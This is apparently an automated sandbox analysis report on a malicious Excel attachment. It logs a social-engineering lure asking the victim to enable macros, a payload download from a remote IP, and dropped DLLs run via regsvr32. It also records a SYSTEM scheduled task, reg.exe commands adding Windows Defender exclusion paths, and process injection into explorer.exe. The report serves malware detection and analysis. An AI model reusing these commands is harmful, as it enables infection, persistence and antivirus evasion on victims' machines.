    Source: global trafficHTTP traffic detected: GET /44463.6863100694.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 51.89.115.111Connection: Keep-Alive

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" button to unlock the document downloaded from the Internet. 38 n ^l: i ffmn i a ml
    Source: Screenshot number: 4Screenshot OCR: Document is Protected 18 19 20 21 VIEW COMPLETED DOCUMENT 22 23 24 25 26 27 :: THE STEPS
    Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" button to unlock the document downloaded from the Internet. 2. Click on "ENABLE CON
    Source: Document image extraction number: 0Screenshot OCR: Document is Protected VIEW COMPLE ILD DOCUMENT THE STEPS ARE REQUIRED TO FULLY DECRYPT THE DOCUMEN
    Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" button to perform Microsoft Exel Decryption Core to start the decryption of the doc
    Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" button to unlock the document downloaded from the Internet. 2. Click on "ENABLE CON
    Source: Document image extraction number: 1Screenshot OCR: Document is Protected VIEW COMPLETED DOCUMENT THE STEPS ARE REQUIRED TO FULLY DECRYPT THE DOCUMENT
    Source: Document image extraction number: 1Screenshot OCR: ENABLE CONTENT" button to perform Microsoft Exel Decryption Core to start the decryption of the doc
    Office process drops PE fileShow sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6863100694[1].datJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6863100694[2].datJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Fiosa2.der
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Fiosa.der
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Fiosa1.derJump to dropped file
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 55_2_10016EB0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 55_2_10012346
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 55_2_10011758
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 55_2_10014FC0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 73_2_000D6EB0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 73_2_000D2346
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 73_2_000D1758
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 73_2_000D4FC0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 86_2_00096EB0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 86_2_00092346
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 86_2_00091758
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 86_2_00094FC0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 87_2_00096EB0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 87_2_00092346
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 87_2_00091758
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 87_2_00094FC0
    Source: Claim-1763045001-09242021.xlsOLE, VBA macro line: Sub auto_open()
    Source: Claim-1763045001-09242021.xlsOLE, VBA macro line: Sub auto_close()
    Source: Claim-1763045001-09242021.xlsOLE, VBA macro line: Private m_openAlreadyRan As Boolean
    Source: Claim-1763045001-09242021.xlsOLE, VBA macro line: Private Sub saWorkbook_Opensa()
    Source: Claim-1763045001-09242021.xlsOLE, VBA macro line: m_openAlreadyRan = True
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 55_2_1000C6C0 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 55_2_1000CB77 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary,
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess Stats: CPU usage > 98%
    Source: 44463.6863100694[2].dat.0.drStatic PE information: No import functions for PE file found
    Source: Fiosa1.der.0.drStatic PE information: No import functions for PE file found
    Source: Fiosa.der.73.drStatic PE information: No import functions for PE file found
    Source: Fiosa2.der.86.drStatic PE information: No import functions for PE file found
    Source: Fiosa.der.87.drStatic PE information: No import functions for PE file found
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Zavnutyohicp' /d '0'
    Source: Claim-1763045001-09242021.xlsOLE indicator, VBA macros: true
    Source: Joe Sandbox ViewDropped File: C:\Users\user\Fiosa.der 4F5DDF752A4621D639C402228BBA62F75450D0E07BEEB36F971F6638C462EA38
    Source: Joe Sandbox ViewDropped File: C:\Users\user\Fiosa2.der 4F5DDF752A4621D639C402228BBA62F75450D0E07BEEB36F971F6638C462EA38
    Source: 44463.6863100694[2].dat.0.drStatic PE information: Data appended to the last section found
    Source: Fiosa1.der.0.drStatic PE information: Data appended to the last section found
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
    Source: 44463.6863100694[1].dat.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: Fiosa.der.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: Fiosa2.der.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: .................................&Z.....(.P.............................\w......................................................................
    Source: C:\Windows\System32\reg.exeConsole Write: ................T...............T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.................N.......(...............
    Source: C:\Windows\System32\reg.exeConsole Write: ................(...............T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y...........).....N.......(...............
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa.der
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa.der
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa1.der
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn mmvyheu /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 16:36 /ET 16:48
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa1.der
    Source: unknownProcess created: C:\Windows\System32\taskeng.exe taskeng.exe {7B099BF3-11FE-497B-BFDA-BF23CFB73488} S-1-5-18:NT AUTHORITY\System:Service:
    Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa2.der
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa2.der
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Zavnutyohicp' /d '0'
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Gurxzqhuuwqa' /d '0'
    Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa.der
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa1.der
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa2.der
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa.der
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn mmvyheu /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 16:36 /ET 16:48
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa1.der
    Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa2.der
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Zavnutyohicp' /d '0'
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Gurxzqhuuwqa' /d '0'
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Windows\System32\taskeng.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{92BDB7E4-F28B-46A0-B551-45A52BDD5125}\InprocServer32
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Application Data\Microsoft\FormsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCFDB.tmpJump to behavior
    Source: classification engineClassification label: mal100.expl.evad.winXLS@34/9@0/3
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 55_2_1000D523 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: Claim-1763045001-09242021.xlsOLE indicator, Workbook stream: true
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 55_2_1000ABA3 CreateToolhelp32Snapshot,memset,Process32First,Process32Next,CloseHandle,
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \BaseNamedObjects\Global\{D1419B89-9A47-41E4-9AA8-B0F941DFA569}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{41D88538-A581-48EE-817B-4B83E858129B}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{3B61A1E7-F95A-4DF7-8B38-17FBF69C0843}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \BaseNamedObjects\{41D88538-A581-48EE-817B-4B83E858129B}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{3B61A1E7-F95A-4DF7-8B38-17FBF69C0843}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \BaseNamedObjects\{D1419B89-9A47-41E4-9AA8-B0F941DFA569}
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 55_2_1000A51A FindResourceA,
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEWindow found: window name: SysTabControl32
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: amstream.pdb source: explorer.exe, 00000049.00000003.1179566339.0000000002731000.00000004.00000001.sdmp
    Source: Binary string: c:\chart-Green\Vowel-list\Place\935\Day.pdb source: regsvr32.exe, 00000037.00000002.1179167392.000000001002A000.00000002.00020000.sdmp, explorer.exe, 00000049.00000003.1180826805.0000000002731000.00000004.00000001.sdmp
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 55_2_1002202C push es; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 55_2_10021C96 pushad ; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 55_2_10026CE9 push dword ptr [esp+eax*4+38h]; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 55_2_10026105 push edi; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 55_2_1002514B pushad ; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 55_2_10027D58 pushfd ; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 55_2_10027679 push es; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 55_2_10023B27 push es; retf
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 55_2_10022F6D push eax; retf
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 55_2_10022FAA push eax; retf
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 73_2_000DA00E push ebx; ret
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 73_2_000DD485 push FFFFFF8Ah; iretd
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 73_2_000DD4B6 push FFFFFF8Ah; iretd
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 73_2_000D9D5C push cs; iretd
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 73_2_000D9E5E push cs; iretd
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 73_2_000DBB29 push esi; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 83_2_1002202C push es; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 83_2_10021C96 pushad ; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 83_2_10026CE9 push dword ptr [esp+eax*4+38h]; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 83_2_10026105 push edi; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 83_2_1002514B pushad ; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 83_2_10027D58 pushfd ; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 83_2_10027679 push es; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 83_2_10023B27 push es; retf
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 83_2_10022F6D push eax; retf
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 83_2_10022FAA push eax; retf
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 85_2_1002202C push es; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 85_2_10021C96 pushad ; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 85_2_10026CE9 push dword ptr [esp+eax*4+38h]; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 85_2_10026105 push edi; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 85_2_1002514B pushad ; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 55_2_10012AEC GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,
    Source: 44463.6863100694[2].dat.0.drStatic PE information: real checksum: 0x7af7b should be: 0x22282
    Source: Fiosa1.der.0.drStatic PE information: real checksum: 0x7af7b should be: 0x22282
    Source: Fiosa.der.73.drStatic PE information: real checksum: 0x7af7b should be: 0xfeba5
    Source: 44463.6863100694[1].dat.0.drStatic PE information: real checksum: 0x7af7b should be: 0x100e78
    Source: Fiosa2.der.86.drStatic PE information: real checksum: 0x7af7b should be: 0x88ca7
    Source: Fiosa.der.87.drStatic PE information: real checksum: 0x7af7b should be: 0x88ca7

    Persistence and Installation Behavior:

    barindex
    Uses cmd line tools excessively to alter registry or file dataShow sources
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: reg.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: reg.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: reg.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: reg.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Fiosa.der
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Fiosa1.derJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Fiosa2.der
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa.der
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa2.derJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa.derJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6863100694[1].datJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6863100694[2].datJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa2.derJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa.derJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Fiosa1.derJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa2.derJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa.derJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Fiosa1.derJump to dropped file

    Boot Survival:

    barindex
    Drops PE files to the user root directoryShow sources
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa2.derJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Fiosa.derJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Fiosa1.derJump to dropped file
    Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn mmvyheu /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 16:36 /ET 16:48

    Hooking and other Techniques for Hiding and Protection:

    barindex
    Overwrites code with unconditional jumps - possibly settings hooks in foreign processShow sources
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 984 base: 8A102D value: E9 BA 4C 82 FF
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2912 base: 8A102D value: E9 BA 4C 7E FF
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 548 base: 8A102D value: E9 BA 4C 7E FF
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOX
    Source: Claim-1763045001-09242021.xlsStream path 'Workbook' entropy: 7.94597570807 (max. 8.0)
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3024Thread sleep count: 43 > 30
    Source: C:\Windows\SysWOW64\explorer.exe TID: 1976Thread sleep time: -124000s >= -30000s
    Source: C:\Windows\System32\taskeng.exe TID: 572Thread sleep time: -60000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 668Thread sleep count: 47 > 30
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 244Thread sleep count: 47 > 30
    Source: C:\Windows\SysWOW64\explorer.exe TID: 196Thread sleep count: 128 > 30
    Source: C:\Windows\SysWOW64\explorer.exe TID: 196Thread sleep time: -96000s >= -30000s
    Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
    Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
    Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6863100694[1].datJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6863100694[2].datJump to dropped file
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information queried: ProcessInformation
